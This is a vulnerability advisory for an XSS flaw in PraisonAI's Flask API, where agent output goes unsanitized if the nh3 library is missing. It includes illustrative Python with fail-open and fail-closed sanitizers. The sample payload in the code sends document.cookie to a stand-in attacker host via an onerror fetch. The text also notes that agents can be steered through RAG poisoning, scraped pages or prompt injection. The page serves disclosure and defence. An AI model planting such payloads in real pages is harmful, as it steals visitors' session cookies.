PT-2026-31781 · Flask +2

Published 2026-04-09 · Updated 2026-04-10 · CVE-2026-40112

CVSS v3.1: 6.1 (Medium)
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions
PraisonAI versions prior to 4.5.128

Description
PraisonAI is a multi-agent system for building teams of AI agents. Its Flask API endpoint in src/praisonai/api.py renders agent output as HTML. The sanitize_html function relies on the nh3 library, which is not declared as a dependency of the package. When nh3 is not installed, the import fails and the function returns the output unsanitized instead of failing closed, so an attacker who can get markup into agent output can inject arbitrary JavaScript that executes in the browser of anyone viewing the API response. The attacker does not need direct access to the API: influencing agent input is enough, for example through RAG data poisoning, attacker-controlled pages returned by web scraping, or prompt injection.
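To make the failure mode concrete, here is an added illustration (written for this page, not PraisonAI's own code) of a sanitizer that imports an optional library and falls back to returning raw markup, next to a fail-closed variant and a startup check that refuses to serve HTML when the sanitizer is missing. The function names, the sample agent output and the fallback logic are assumptions modelled on the description above; only nh3.clean is a real API.

```python
"""Added example (not PraisonAI's code): the fail-open sanitizer pattern the
advisory describes, beside a fail-closed variant and a deployment check.
Function names, the sample output and the fallback logic are assumptions."""
import html
import re
from typing import Callable, Optional

Cleaner = Callable[[str], str]

# Constructed sample of agent output that an attacker influenced upstream
# (e.g. via a poisoned RAG document or a scraped page). Not real data.
POISONED_AGENT_OUTPUT = (
    "Summary of the requested page. "
    '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">'
    "<script>alert(document.domain)</script>"
)

# Anything a browser would start parsing as a tag: "<" followed by a letter, "!" or "/".
TAG_RE = re.compile(r"<[a-zA-Z!/]")


def load_cleaner() -> Optional[Cleaner]:
    """Return nh3.clean when nh3 is importable, else None.
    Mirrors an optional import of a library that is not a declared dependency."""
    try:
        import nh3  # type: ignore
    except ImportError:
        return None
    return nh3.clean


def sanitize_html_fail_open(content: str, cleaner: Optional[Cleaner]) -> str:
    """Vulnerable pattern (assumed): when the sanitizer is missing, the raw
    markup is returned and rendered, so the <script> above reaches the browser."""
    if cleaner is None:
        return content
    return cleaner(content)


def sanitize_html_fail_closed(content: str, cleaner: Optional[Cleaner]) -> str:
    """Hardened pattern: with no sanitizer available, escape the whole string.
    Rich formatting is lost, but the browser never parses attacker markup."""
    if cleaner is None:
        return html.escape(content, quote=True)
    return cleaner(content)


def contains_html_tags(rendered: str) -> bool:
    """True if the rendered string still contains something parsed as a tag."""
    return TAG_RE.search(rendered) is not None


def require_sanitizer(cleaner: Optional[Cleaner]) -> Cleaner:
    """Deployment check: refuse to expose the HTML-rendering endpoint at all
    rather than silently serve unsanitized agent output."""
    if cleaner is None:
        raise RuntimeError("nh3 is not installed; refusing to render agent output as HTML")
    return cleaner


if __name__ == "__main__":
    cleaner = load_cleaner()
    print("nh3 available on this machine:", cleaner is not None)
    # Simulate the advisory's condition (nh3 absent) regardless of this machine.
    print("fail-open   ->", sanitize_html_fail_open(POISONED_AGENT_OUTPUT, None))
    print("fail-closed ->", sanitize_html_fail_closed(POISONED_AGENT_OUTPUT, None))
```

The cleaner is passed explicitly so that the missing-nh3 path can be exercised on a machine where nh3 happens to be installed; in a real service the result of load_cleaner() would be checked once at startup with require_sanitizer rather than on every request.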
Recommendations
Update PraisonAI to version 4.5.128 or later. Until the update is applied, make sure nh3 is actually installed in the environment that serves the API (python -c "import nh3" should succeed there) and pin it explicitly, since the bypass only occurs when that import fails.

Weakness Enumeration

XSS
Related Identifiers

CVE-2026-40112
GHSA-CFG2-MXFJ-J6PW

Affected Products

Flask
PraisonAI
nh3